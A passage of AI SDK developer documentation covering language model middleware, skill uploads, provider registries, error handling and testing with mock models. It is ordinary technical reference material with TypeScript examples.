When set to true, the reasoning tag will be prepended to the generated text.
This is useful for models that do not include the reasoning tag at the beginning of the response.
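A minimal sketch of enabling the option:
import { wrapLanguageModel, extractReasoningMiddleware } from 'ai';
const model = wrapLanguageModel({
  model: yourModel,
  middleware: extractReasoningMiddleware({
    tagName: 'think',
    // treat the response as if it starts inside a <think> tag
    startWithReasoning: true,
  }),
});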
For more details, see the DeepSeek R1 guide.
Extract JSON
Some models wrap JSON responses in markdown code fences (e.g., ```json ... ```) even when you request structured output.
The extractJsonMiddleware function strips these code fences from the response, making it compatible with Output.object().
import {
wrapLanguageModel,
extractJsonMiddleware,
Output,
generateText,
} from 'ai';
import { z } from 'zod';
const model = wrapLanguageModel({
model: yourModel,
middleware: extractJsonMiddleware(),
});
const result = await generateText({
model,
output: Output.object({
schema: z.object({
name: z.string(),
ingredients: z.array(z.string()),
}),
}),
prompt: 'Generate a recipe.',
});
You can also provide a custom transform function for models that use different formatting:
const model = wrapLanguageModel({
model: yourModel,
middleware: extractJsonMiddleware({
transform: text => text.replace(/^PREFIX/, '').replace(/SUFFIX$/, ''),
}),
});
Simulate Streaming
The simulateStreamingMiddleware function can be used to simulate streaming behavior with responses from non-streaming language models.
This is useful when you want to maintain a consistent streaming interface even when using models that only provide complete responses.
import { wrapLanguageModel, simulateStreamingMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: simulateStreamingMiddleware(),
});
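The wrapped model can then be consumed through the streaming API even though the underlying model only returns complete responses, e.g. (a sketch):
import { streamText } from 'ai';
const result = streamText({
  model,
  prompt: 'Write a haiku about the ocean.',
});
// the complete response is emitted as simulated stream parts
for await (const textPart of result.textStream) {
  process.stdout.write(textPart);
}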
Default Settings
The defaultSettingsMiddleware function can be used to apply default settings to a language model.
import { wrapLanguageModel, defaultSettingsMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: defaultSettingsMiddleware({
settings: {
temperature: 0.5,
maxOutputTokens: 800,
providerOptions: { openai: { store: false } },
},
}),
});
Add Tool Input Examples
The addToolInputExamplesMiddleware function adds tool input examples to tool descriptions.
This is useful for providers that don't natively support the inputExamples property on tools.
The middleware serializes the examples into the tool's description text so models can still benefit from seeing example inputs.
import { wrapLanguageModel, addToolInputExamplesMiddleware } from 'ai';
const model = wrapLanguageModel({
model: yourModel,
middleware: addToolInputExamplesMiddleware({
prefix: 'Input Examples:',
}),
});
When you define a tool with inputExamples, the middleware will append them to the tool's description:
import { generateText, tool } from 'ai';
import { z } from 'zod';
const result = await generateText({
model, // wrapped model from above
tools: {
weather: tool({
description: 'Get the weather in a location',
inputSchema: z.object({
location: z.string(),
}),
inputExamples: [
{ input: { location: 'San Francisco' } },
{ input: { location: 'London' } },
],
}),
},
prompt: 'What is the weather in Tokyo?',
});
The tool description will be transformed to:
Get the weather in a location
Input Examples:
{"location":"San Francisco"}
{"location":"London"}
Options
- prefix (optional): A prefix text to prepend before the examples. Default: 'Input Examples:'.
- format (optional): A custom formatter function for each example. Receives the example object and its index. Default: JSON.stringify(example.input).
- remove (optional): Whether to remove the inputExamples property from the tool after adding them to the description. Default: true.
const model = wrapLanguageModel({
model: yourModel,
middleware: addToolInputExamplesMiddleware({
prefix: 'Input Examples:',
format: (example, index) =>
`${index + 1}. ${JSON.stringify(example.input)}`,
remove: true,
}),
});
Community Middleware
The AI SDK provides a Language Model Middleware specification. Community members can develop middleware that adheres to this specification, making it compatible with the AI SDK ecosystem.
Here are some community middlewares that you can explore:
Custom tool call parser
The Custom tool call parser middleware extends tool call capabilities to models that don't natively support the OpenAI-style tools parameter. This includes many self-hosted and third-party models that lack native function calling features.
This middleware enables function calling by converting function schemas into prompt instructions and parsing the model's responses into structured function calls: the JSON function definitions are transformed into natural language instructions the model can understand, and the generated text is then analyzed to extract function call attempts. The result is a consistent function calling API across model providers, even for models that don't natively support the OpenAI-style function calling format.
The @ai-sdk-tool/parser package offers three middleware variants:
- createToolMiddleware: A flexible function for creating custom tool call middleware tailored to specific models
- hermesToolMiddleware: Ready-to-use middleware for Hermes & Qwen format function calls
- gemmaToolMiddleware: Pre-configured middleware for the Gemma 3 model series function call format
Here's how you can enable function calls with Gemma models that don't support them natively:
import { wrapLanguageModel } from 'ai';
import { gemmaToolMiddleware } from '@ai-sdk-tool/parser';
const model = wrapLanguageModel({
model: openrouter('google/gemma-3-27b-it'),
middleware: gemmaToolMiddleware,
});
Find more examples at this link.
Implementing Language Model Middleware
You can implement any of the following three functions to modify the behavior of the language model:
- transformParams: Transforms the parameters before they are passed to the language model, for both doGenerate and doStream.
- wrapGenerate: Wraps the doGenerate method of the language model. You can modify the parameters, call the language model, and modify the result.
- wrapStream: Wraps the doStream method of the language model. You can modify the parameters, call the language model, and modify the result.
Here are some examples of how to implement language model middleware:
Examples
Logging
This example shows how to log the parameters and generated text of a language model call.
import type {
LanguageModelV4Middleware,
LanguageModelV4StreamPart,
} from '@ai-sdk/provider';
export const yourLogMiddleware: LanguageModelV4Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
console.log('doGenerate called');
console.log(`params: ${JSON.stringify(params, null, 2)}`);
const result = await doGenerate();
console.log('doGenerate finished');
console.log(`generated text: ${result.text}`);
return result;
},
wrapStream: async ({ doStream, params }) => {
console.log('doStream called');
console.log(`params: ${JSON.stringify(params, null, 2)}`);
const { stream, ...rest } = await doStream();
let generatedText = '';
const textBlocks = new Map<string, string>();
const transformStream = new TransformStream<
LanguageModelV4StreamPart,
LanguageModelV4StreamPart
>({
transform(chunk, controller) {
switch (chunk.type) {
case 'text-start': {
textBlocks.set(chunk.id, '');
break;
}
case 'text-delta': {
const existing = textBlocks.get(chunk.id) || '';
textBlocks.set(chunk.id, existing + chunk.delta);
generatedText += chunk.delta;
break;
}
case 'text-end': {
console.log(
`Text block ${chunk.id} completed:`,
textBlocks.get(chunk.id),
);
break;
}
}
controller.enqueue(chunk);
},
flush() {
console.log('doStream finished');
console.log(`generated text: ${generatedText}`);
},
});
return {
stream: stream.pipeThrough(transformStream),
...rest,
};
},
};
Caching
This example shows how to build a simple cache for the generated text of a language model call.
import type { LanguageModelV4Middleware } from '@ai-sdk/provider';
const cache = new Map<string, any>();
export const yourCacheMiddleware: LanguageModelV4Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
const cacheKey = JSON.stringify(params);
if (cache.has(cacheKey)) {
return cache.get(cacheKey);
}
const result = await doGenerate();
cache.set(cacheKey, result);
return result;
},
// here you would implement the caching logic for streaming
};
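For streaming, one rough approach is to record the stream parts as they pass through and replay them with simulateReadableStream on a cache hit. This is a minimal sketch, assuming a simple in-memory Map (streamCache and yourStreamCacheMiddleware are illustrative names; a production cache also needs eviction and error handling):
import { simulateReadableStream } from 'ai';
import type {
  LanguageModelV4Middleware,
  LanguageModelV4StreamPart,
} from '@ai-sdk/provider';
const streamCache = new Map<string, LanguageModelV4StreamPart[]>();
export const yourStreamCacheMiddleware: LanguageModelV4Middleware = {
  wrapStream: async ({ doStream, params }) => {
    const cacheKey = JSON.stringify(params);
    // cache hit: replay the recorded parts as a simulated stream
    // (response metadata from the original call is not restored in this sketch)
    const cached = streamCache.get(cacheKey);
    if (cached != null) {
      return { stream: simulateReadableStream({ chunks: cached }) };
    }
    // cache miss: record each part while forwarding it downstream
    const { stream, ...rest } = await doStream();
    const parts: LanguageModelV4StreamPart[] = [];
    const recorder = new TransformStream<
      LanguageModelV4StreamPart,
      LanguageModelV4StreamPart
    >({
      transform(chunk, controller) {
        parts.push(chunk);
        controller.enqueue(chunk);
      },
      flush() {
        // store only once the stream has completed
        streamCache.set(cacheKey, parts);
      },
    });
    return { stream: stream.pipeThrough(recorder), ...rest };
  },
};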
Retrieval Augmented Generation (RAG)
This example shows how to use RAG as middleware.
import type { LanguageModelV4Middleware } from '@ai-sdk/provider';
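// Note: getLastUserMessageText, findSources, and addToLastUserMessage
// are illustrative helpers for this example; they are not part of the AI SDK.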
export const yourRagMiddleware: LanguageModelV4Middleware = {
transformParams: async ({ params }) => {
const lastUserMessageText = getLastUserMessageText({
prompt: params.prompt,
});
if (lastUserMessageText == null) {
return params; // do not use RAG (send unmodified parameters)
}
const instruction =
'Use the following information to answer the question:\n' +
findSources({ text: lastUserMessageText })
.map(chunk => JSON.stringify(chunk))
.join('\n');
return addToLastUserMessage({ params, text: instruction });
},
};
Guardrails
Guardrails are a way to ensure that the generated text of a language model call is safe and appropriate. This example shows how to use guardrails as middleware.
import type { LanguageModelV4Middleware } from '@ai-sdk/provider';
export const yourGuardrailMiddleware: LanguageModelV4Middleware = {
wrapGenerate: async ({ doGenerate }) => {
const { text, ...rest } = await doGenerate();
// filtering approach, e.g. for PII or other sensitive information:
const cleanedText = text?.replace(/badword/g, '<REDACTED>');
return { text: cleanedText, ...rest };
},
// here you would implement the guardrail logic for streaming
// Note: streaming guardrails are difficult to implement, because
// you do not know the full content of the stream until it's finished.
};
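For streams, a naive starting point is to redact each text delta as it passes through. This is a sketch only: per-chunk filtering misses words that are split across delta boundaries, which is why real streaming guardrails typically buffer text before releasing it:
import type {
  LanguageModelV4Middleware,
  LanguageModelV4StreamPart,
} from '@ai-sdk/provider';
export const yourStreamGuardrailMiddleware: LanguageModelV4Middleware = {
  wrapStream: async ({ doStream }) => {
    const { stream, ...rest } = await doStream();
    const transformStream = new TransformStream<
      LanguageModelV4StreamPart,
      LanguageModelV4StreamPart
    >({
      transform(chunk, controller) {
        if (chunk.type === 'text-delta') {
          // naive per-chunk redaction; 'bad' + 'word' split across two deltas slips through
          controller.enqueue({
            ...chunk,
            delta: chunk.delta.replace(/badword/g, '<REDACTED>'),
          });
        } else {
          controller.enqueue(chunk);
        }
      },
    });
    return { stream: stream.pipeThrough(transformStream), ...rest };
  },
};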
Configuring Per Request Custom Metadata
To send and access custom metadata in middleware, you can use providerOptions. This is useful when building logging middleware where you want to pass additional context like user IDs, timestamps, or other contextual data that can help with tracking and debugging.
import { generateText, wrapLanguageModel } from 'ai';
__PROVIDER_IMPORT__;
import type { LanguageModelV4Middleware } from '@ai-sdk/provider';
export const yourLogMiddleware: LanguageModelV4Middleware = {
wrapGenerate: async ({ doGenerate, params }) => {
console.log('METADATA', params?.providerMetadata?.yourLogMiddleware);
const result = await doGenerate();
return result;
},
};
const { text } = await generateText({
model: wrapLanguageModel({
model: __MODEL__,
middleware: yourLogMiddleware,
}),
prompt: 'Invent a new holiday and describe its traditions.',
providerOptions: {
yourLogMiddleware: {
hello: 'world',
},
},
});
console.log(text);
title: Skill Uploads description: Learn how to upload skills and use provider references with the AI SDK.
Skill Uploads
The AI SDK provides the uploadSkill
function to upload custom skills to a provider and get back a ProviderReference that
can be passed to subsequent inference calls.
A skill is a bundle of files (e.g. a SKILL.md describing the skill's behavior)
that providers can load, e.g. in sandboxed container environments.
In the AI SDK, the uploaded skill is identified by a ProviderReference — a
Record<string, string> mapping provider names to provider-specific identifiers.
This concept is used for other provider-specific asset references too, such as uploaded media files.
import { uploadSkill, generateText } from 'ai';
import { anthropic, type AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { readFileSync } from 'fs';
const { providerReference } = await uploadSkill({
api: anthropic.skills(),
files: [
{
path: 'my-skill/SKILL.md',
content: readFileSync('./SKILL.md'),
},
],
displayTitle: 'My Skill',
});
const { text } = await generateText({
model: anthropic('claude-sonnet-4-6'),
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
},
prompt: 'Use the skill to complete the task.',
providerOptions: {
anthropic: {
container: {
skills: [{ type: 'custom', providerReference }],
},
} satisfies AnthropicLanguageModelOptions,
},
});
As a shorthand, you can pass a provider instance directly to api instead of calling .skills() explicitly — the SDK will call .skills() for you:
const { providerReference } = await uploadSkill({
api: anthropic, // shorthand for anthropic.skills()
files: [{ path: 'my-skill/SKILL.md', content: readFileSync('./SKILL.md') }],
displayTitle: 'My Skill',
});
Skill Files
A skill is composed of one or more files, each with a relative path and content.
File content can be provided as a Uint8Array (e.g. from fs.readFileSync) or as a
base64-encoded string:
import { uploadSkill } from 'ai';
import { openai } from '@ai-sdk/openai';
import { readFileSync } from 'fs';
const { providerReference } = await uploadSkill({
api: openai.skills(),
files: [
{
path: 'my-skill/SKILL.md',
content: readFileSync('./SKILL.md'), // Uint8Array
},
{
path: 'my-skill/helper.py',
content: readFileSync('./helper.py'),
},
],
});
Upload Result
uploadSkill returns an UploadSkillResult with the following fields:
| Field | Type | Description |
|---|---|---|
| providerReference | ProviderReference | Maps provider names to provider-specific skill IDs |
| displayTitle | string? | Human-readable title (if supported and provided) |
| name | string? | Name inferred by the provider from the skill files |
| description | string? | Description inferred by the provider from the skill files |
| latestVersion | string? | Latest version identifier assigned by the provider |
| providerMetadata | object? | Additional provider-specific metadata (e.g. timestamps) |
| warnings | Warning[] | Warnings for unsupported options (e.g. displayTitle on OpenAI) |
Provider References
A ProviderReference is a Record<string, string> mapping provider names to
provider-specific skill identifiers:
// Example ProviderReference
{
anthropic: 'skill_abc123',
}
Pass the providerReference when referencing the skill during inference. Each provider
looks up its own skill ID from the reference. If no entry exists for the current
provider, an error is thrown.
Multi-Provider Usage
If you want to use the same skill across multiple providers, upload it to each one and merge the references:
import { uploadSkill } from 'ai';
import { openai } from '@ai-sdk/openai';
import { anthropic } from '@ai-sdk/anthropic';
const [openaiUpload, anthropicUpload] = await Promise.all([
uploadSkill({
api: openai.skills(),
files: [{ path: 'my-skill/SKILL.md', content: skillSource }],
}),
uploadSkill({
api: anthropic.skills(),
files: [{ path: 'my-skill/SKILL.md', content: skillSource }],
displayTitle: 'My Skill',
}),
]);
const mergedReference = {
...openaiUpload.providerReference,
...anthropicUpload.providerReference,
};
// mergedReference: { openai: 'sk_...', anthropic: 'sk_...' }
The merged reference can then be used in inference calls regardless of which provider processes the request — each provider will find its own skill ID.
Using Skills in Inference Calls
How you attach a skill to an inference call depends on the provider.
Anthropic
Pass the providerReference inside the container.skills array in providerOptions:
import { generateText } from 'ai';
import { anthropic, type AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
await generateText({
model: anthropic('claude-sonnet-4-6'),
tools: {
code_execution: anthropic.tools.codeExecution_20260120(),
},
prompt: '...',
providerOptions: {
anthropic: {
container: {
skills: [{ type: 'custom', providerReference }],
},
} satisfies AnthropicLanguageModelOptions,
},
});
OpenAI
Pass the providerReference inside the shell tool's environment.skills array:
import { generateText } from 'ai';
import { openai } from '@ai-sdk/openai';
await generateText({
model: openai.responses('gpt-5.2'),
tools: {
shell: openai.tools.shell({
environment: {
type: 'containerAuto',
skills: [{ type: 'skillReference', providerReference }],
},
}),
},
prompt: '...',
});
Supported Providers
The following providers support skills() and skill uploads:
| Provider | Factory Method |
|---|---|
| Anthropic | anthropic.skills() |
| OpenAI | openai.skills() |
title: Provider & Model Management description: Learn how to work with multiple providers and models
Provider & Model Management
When you work with multiple providers and models, it is often desirable to manage them in a central place and access the models through simple string ids.
The AI SDK offers custom providers and a provider registry for this purpose:
- With custom providers, you can pre-configure model settings, provide model name aliases, and limit the available models.
- The provider registry lets you mix multiple providers and access them through simple string ids.
You can mix and match custom providers, the provider registry, and middleware in your application.
Custom Providers
You can create a custom provider using customProvider.
Example: custom model settings
You might want to override the default model settings for a provider or provide model name aliases with pre-configured settings.
import {
gateway,
customProvider,
defaultSettingsMiddleware,
wrapLanguageModel,
} from 'ai';
// custom provider with different provider options:
export const openai = customProvider({
languageModels: {
// replacement model with custom provider options:
'gpt-5.1': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
// alias model with custom provider options:
'gpt-5.1-high-reasoning': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
},
fallbackProvider: gateway,
});
Example: model name alias
You can also provide model name aliases, so you can update the model version in one place in the future:
import { customProvider, gateway } from 'ai';
// custom provider with alias names:
export const anthropic = customProvider({
languageModels: {
opus: gateway('anthropic/claude-opus-4.1'),
sonnet: gateway('anthropic/claude-sonnet-4.5'),
haiku: gateway('anthropic/claude-haiku-4.5'),
},
fallbackProvider: gateway,
});
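Code that consumes the aliases can then stay unchanged when you later swap the underlying model versions. A usage sketch (the './providers' import path is illustrative and assumes the file above):
import { generateText } from 'ai';
import { anthropic } from './providers';
const { text } = await generateText({
  model: anthropic.languageModel('sonnet'),
  prompt: 'Invent a new holiday and describe its traditions.',
});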
Example: limit available models
You can limit the available models in the system, even if you have multiple providers.
import {
customProvider,
defaultSettingsMiddleware,
wrapLanguageModel,
gateway,
} from 'ai';
export const myProvider = customProvider({
languageModels: {
'text-medium': gateway('anthropic/claude-3-5-sonnet-20240620'),
'text-small': gateway('openai/gpt-5-mini'),
'reasoning-medium': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'high',
},
},
},
}),
}),
'reasoning-fast': wrapLanguageModel({
model: gateway('openai/gpt-5.1'),
middleware: defaultSettingsMiddleware({
settings: {
providerOptions: {
openai: {
reasoningEffort: 'low',
},
},
},
}),
}),
},
embeddingModels: {
embedding: gateway.embeddingModel('openai/text-embedding-3-small'),
},
// no fallback provider
});
Example: files and skills interfaces
You can attach a provider's files or skills interface to your custom provider. This allows you to use uploadFile and uploadSkill through the same provider abstraction.
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { customProvider, uploadFile, uploadSkill } from 'ai';
// custom provider with files interface:
const myOpenAI = customProvider({
languageModels: {
'gpt-4o-mini': openai.responses('gpt-4o-mini'),
},
files: openai.files(),
});
// custom provider with skills interface:
const myAnthropic = customProvider({
languageModels: {
sonnet: anthropic('claude-sonnet-4-5'),
},
skills: anthropic.skills(),
});
// usage:
await uploadFile({ api: myOpenAI.files!(), data: fileData, filename: 'image.png' });
await uploadSkill({ api: myAnthropic.skills!(), files: skillFiles, displayTitle: 'My Skill' });
If no files or skills option is set but a fallbackProvider is configured, the custom provider will inherit those interfaces from the fallback.
Provider Registry
You can create a provider registry with multiple providers and models using createProviderRegistry.
Setup
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';
export const registry = createProviderRegistry({
// register provider with prefix and default setup using gateway:
gateway,
// register provider with prefix and direct provider import:
anthropic,
openai,
});
Setup with Custom Separator
By default, the registry uses : as the separator between provider and model IDs. You can customize this separator:
import { anthropic } from '@ai-sdk/anthropic';
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, gateway } from 'ai';
export const customSeparatorRegistry = createProviderRegistry(
{
gateway,
anthropic,
openai,
},
{ separator: ' > ' },
);
Example: Use language models
You can access language models by using the languageModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { generateText } from 'ai';
import { registry } from './registry';
const { text } = await generateText({
model: registry.languageModel('openai:gpt-5.1'), // default separator
// or with custom separator:
// model: customSeparatorRegistry.languageModel('openai > gpt-5.1'),
prompt: 'Invent a new holiday and describe its traditions.',
});
Example: Use text embedding models
You can access text embedding models by using the .embeddingModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { embed } from 'ai';
import { registry } from './registry';
const { embedding } = await embed({
model: registry.embeddingModel('openai:text-embedding-3-small'),
value: 'sunny day at the beach',
});
Example: Use image models
You can access image models by using the imageModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { generateImage } from 'ai';
import { registry } from './registry';
const { image } = await generateImage({
model: registry.imageModel('openai:dall-e-3'),
prompt: 'A beautiful sunset over a calm ocean',
});
Example: Use video models
You can access video models by using the videoModel method on the registry.
The provider id will become the prefix of the model id: providerId:modelId.
import { createProviderRegistry, experimental_generateVideo } from 'ai';
import { fal } from '@ai-sdk/fal';
const registry = createProviderRegistry({ fal });
const { videos } = await experimental_generateVideo({
model: registry.videoModel('fal:luma-dream-machine/ray-2'),
prompt: 'A cat walking on a beach at sunset',
});
Example: Use files interface
You can access a provider's files interface by calling registry.files(providerId).
This is useful when you want to upload files through a provider in the registry before referencing them in model requests.
import { openai } from '@ai-sdk/openai';
import { createProviderRegistry, customProvider, generateText, uploadFile } from 'ai';
const registry = createProviderRegistry({
openai: customProvider({
languageModels: { 'gpt-4o-mini': openai.responses('gpt-4o-mini') },
files: openai.files(),
}),
});
const { providerReference } = await uploadFile({
api: registry.files('openai'),
data: fileData,
filename: 'image.png',
});
const { text } = await generateText({
model: registry.languageModel('openai:gpt-4o-mini'),
messages: [
{
role: 'user',
content: [
{ type: 'text', text: 'Describe what you see in this image.' },
{ type: 'image', image: providerReference },
],
},
],
});
Example: Use skills interface
You can access a provider's skills interface by calling registry.skills(providerId).
import { anthropic } from '@ai-sdk/anthropic';
import { createProviderRegistry, customProvider, uploadSkill } from 'ai';
const registry = createProviderRegistry({
anthropic: customProvider({
languageModels: { sonnet: anthropic('claude-sonnet-4-5') },
skills: anthropic.skills(),
}),
});
await uploadSkill({
api: registry.skills('anthropic'),
files: skillFiles,
displayTitle: 'My Skill',
});
Combining Custom Providers, Provider Registry, and Middleware
The central idea of provider management is to set up a file that contains all the providers and models you want to use. You may want to pre-configure model settings, provide model name aliases, limit the available models, and more.
Here is an example that implements the following concepts:
- pass through gateway with a namespace prefix (here: gateway > *)
- pass through a full provider with a namespace prefix (here: xai > *)
- setup an OpenAI-compatible provider with custom api key and base URL (here: custom > *)
- setup model name aliases (here: anthropic > fast, anthropic > writing, anthropic > reasoning)
- pre-configure model settings (here: anthropic > reasoning)
- validate the provider-specific options (here: AnthropicLanguageModelOptions)
- use a fallback provider (here: anthropic > *)
- limit a provider to certain models without a fallback (here: groq > gemma2-9b-it, groq > qwen-qwq-32b)
- define a custom separator for the provider registry (here: >)
import { anthropic, type AnthropicLanguageModelOptions } from '@ai-sdk/anthropic';
import { createOpenAICompatible } from '@ai-sdk/openai-compatible';
import { xai } from '@ai-sdk/xai';
import { groq } from '@ai-sdk/groq';
import {
createProviderRegistry,
customProvider,
defaultSettingsMiddleware,
gateway,
wrapLanguageModel,
} from 'ai';
export const registry = createProviderRegistry(
{
// pass through gateway with a namespace prefix
gateway,
// pass through full providers with namespace prefixes
xai,
// access an OpenAI-compatible provider with custom setup
custom: createOpenAICompatible({
name: 'provider-name',
apiKey: process.env.CUSTOM_API_KEY,
baseURL: 'https://api.custom.com/v1',
}),
// setup model name aliases
anthropic: customProvider({
languageModels: {
fast: anthropic('claude-haiku-4-5'),
// simple model
writing: anthropic('claude-sonnet-4-5'),
// extended reasoning model configuration:
reasoning: wrapLanguageModel({
model: anthropic('claude-sonnet-4-5'),
middleware: defaultSettingsMiddleware({
settings: {
maxOutputTokens: 100000, // example default setting
providerOptions: {
anthropic: {
thinking: {
type: 'enabled',
budgetTokens: 32000,
},
} satisfies AnthropicLanguageModelOptions,
},
},
}),
}),
},
fallbackProvider: anthropic,
}),
// limit a provider to certain models without a fallback
groq: customProvider({
languageModels: {
'gemma2-9b-it': groq('gemma2-9b-it'),
'qwen-qwq-32b': groq('qwen-qwq-32b'),
},
}),
},
{ separator: ' > ' },
);
// usage:
const model = registry.languageModel('anthropic > reasoning');
Global Provider Configuration
AI SDK 5 includes a global provider feature that lets you specify a model using just a plain model ID string:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const result = await streamText({
model: __MODEL__, // Uses the global provider (defaults to gateway)
prompt: 'Invent a new holiday and describe its traditions.',
});
By default, the global provider is set to the Vercel AI Gateway.
Customizing the Global Provider
You can set your own preferred global provider:
import { openai } from '@ai-sdk/openai';
// Initialize once during startup:
globalThis.AI_SDK_DEFAULT_PROVIDER = openai;
import { streamText } from 'ai';
const result = await streamText({
model: 'gpt-5.1', // Uses OpenAI provider without prefix
prompt: 'Invent a new holiday and describe its traditions.',
});
This simplifies provider usage and makes it easier to switch between providers without changing your model references throughout your codebase.
title: Error Handling description: Learn how to handle errors in the AI SDK Core
Error Handling
Handling regular errors
Regular errors are thrown and can be handled using the try/catch block.
import { generateText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { text } = await generateText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
} catch (error) {
// handle error
}
See Error Types for more information on the different types of errors that may be thrown.
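For example, you can narrow the caught error with the type guards that the AI SDK error classes expose. A sketch using APICallError (other error types follow the same isInstance pattern):
import { generateText, APICallError } from 'ai';
__PROVIDER_IMPORT__;
try {
  const { text } = await generateText({
    model: __MODEL__,
    prompt: 'Write a vegetarian lasagna recipe for 4 people.',
  });
} catch (error) {
  if (APICallError.isInstance(error)) {
    // provider/API-level failure, e.g. invalid key or rate limit
    console.error('API call failed with status', error.statusCode);
  } else {
    throw error;
  }
}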
Handling streaming errors (simple streams)
When errors occur during streams that do not support error chunks,
the error is thrown as a regular error.
You can handle these errors using the try/catch block.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { textStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
} catch (error) {
// handle error
}
Handling streaming errors (streaming with error support)
Full streams support error parts. You can handle these parts like any other part. It is recommended to also add a try/catch block for errors that happen outside of streaming.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
try {
const { fullStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const part of fullStream) {
switch (part.type) {
// ... handle other part types
case 'error': {
const error = part.error;
// handle error
break;
}
case 'abort': {
// handle stream abort
break;
}
case 'tool-error': {
const error = part.error;
// handle error
break;
}
}
}
} catch (error) {
// handle error
}
Handling stream aborts
When streams are aborted (e.g., via chat stop button), you may want to perform cleanup operations like updating stored messages in your UI. Use the onAbort callback to handle these cases.
The onAbort callback is called when a stream is aborted via AbortSignal, but onFinish is not called. This ensures you can still update your UI state appropriately.
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const { textStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
onAbort: ({ steps }) => {
// Update stored messages or perform cleanup
console.log('Stream aborted after', steps.length, 'steps');
},
onFinish: ({ steps, totalUsage }) => {
// This is called on normal completion
console.log('Stream completed normally');
},
});
for await (const textPart of textStream) {
process.stdout.write(textPart);
}
The onAbort callback receives:
- steps: An array of all completed steps before the abort
You can also handle abort events directly in the stream:
import { streamText } from 'ai';
__PROVIDER_IMPORT__;
const { fullStream } = streamText({
model: __MODEL__,
prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});
for await (const chunk of fullStream) {
switch (chunk.type) {
case 'abort': {
// Handle abort directly in stream
console.log('Stream was aborted');
break;
}
// ... handle other part types
}
}
title: Testing description: Learn how to use AI SDK Core mock providers for testing.
Testing
Testing language models can be challenging, because they are non-deterministic and calling them is slow and expensive.
To enable you to unit test your code that uses the AI SDK, the AI SDK Core
includes mock providers and test helpers. You can import the following helpers from ai/test:
- MockEmbeddingModelV4: A mock embedding model using the embedding model v4 specification.
- MockLanguageModelV4: A mock language model using the language model v4 specification.
- mockId: Provides an incrementing integer ID.
- mockValues: Iterates over an array of values with each call. Returns the last value when the array is exhausted.
You can also import simulateReadableStream from ai to simulate a readable stream with delays.
With mock providers and test helpers, you can control the output of the AI SDK and test your code in a repeatable and deterministic way without actually calling a language model provider.
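For instance, mockId and mockValues behave roughly as follows (a sketch; the exact generated ID format may differ):
import { mockId, mockValues } from 'ai/test';
// mockId returns a generator function that produces incrementing IDs:
const generateId = mockId();
generateId(); // e.g. 'id-0'
generateId(); // e.g. 'id-1'
// mockValues returns a function that steps through the given values
// and keeps returning the last one once they are exhausted:
const nextValue = mockValues('first', 'second');
nextValue(); // 'first'
nextValue(); // 'second'
nextValue(); // 'second'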
Examples
You can use the test helpers with the AI Core functions in your unit tests:
generateText
import { generateText } from 'ai';
import { MockLanguageModelV4 } from 'ai/test';
const result = await generateText({
model: new MockLanguageModelV4({
doGenerate: async () => ({
content: [{ type: 'text', text: `Hello, world!` }],
finishReason: { unified: 'stop', raw: undefined },
usage: {
inputTokens: {
total: 10,
noCache: 10,
cacheRead: undefined,
cacheWrite: undefined,
},
outputTokens: {
total: 20,
text: 20,
reasoning: undefined,
},
},
warnings: [],
}),
}),
prompt: 'Hello, test!',
});
streamText
import { streamText, simulateReadableStream } from 'ai';
import { MockLanguageModelV4 } from 'ai/test';
const result = streamText({
model: new MockLanguageModelV4({
doStream: async () => ({
stream: simulateReadableStream({
chunks: [
{ type: 'text-start', id: 'text-1' },
{ type: 'text-delta', id: 'text-1', delta: 'Hello' },
{ type: 'text-delta', id: 'text-1', delta: ', ' },
{ type: 'text-delta', id: 'text-1', delta: 'world!' },
{ type: 'text-end', id: 'text-1' },
{
type: 'finish',
finishReason: { unified: 'stop', raw: undefined },
logprobs: undefined,
usage: {
inputTokens: {
total: 3,
noCache: 3,
cacheRead: undefined,
cacheWrite: undefined,
},
outputTokens: {
total: 10,
text: 10,
reasoning: undefined,
},
},
},
],
}),
}),
}),
prompt: 'Hello, test!',
});
generateText with Output
import { generateText, Output } from 'ai';
import { MockLanguageModelV4 } from 'ai/test';
import { z } from 'zod';
const result = await generateText({
model: new MockLanguageModelV4({
doGenerate: async () => ({
content: [{ type: 'text', text: `{"content":"Hello, world!"}` }],
finishReason: { unified: 'stop', raw: undefined },
usage: {
inputTokens: {
total: 10,
noCache: 10,
cacheRead: undefined,
cacheWrite: undefined,
},
outputTokens: {
total: 20,
text: 20,
reasoning: undefined,
},
},
warnings: [],
}),
}),
output: Output.object({ schema: z.object({ content: z.string() }) }),
prompt: 'Hello, test!',
});
streamText with Output
import { streamText, Output, simulateReadableStream } from 'ai';
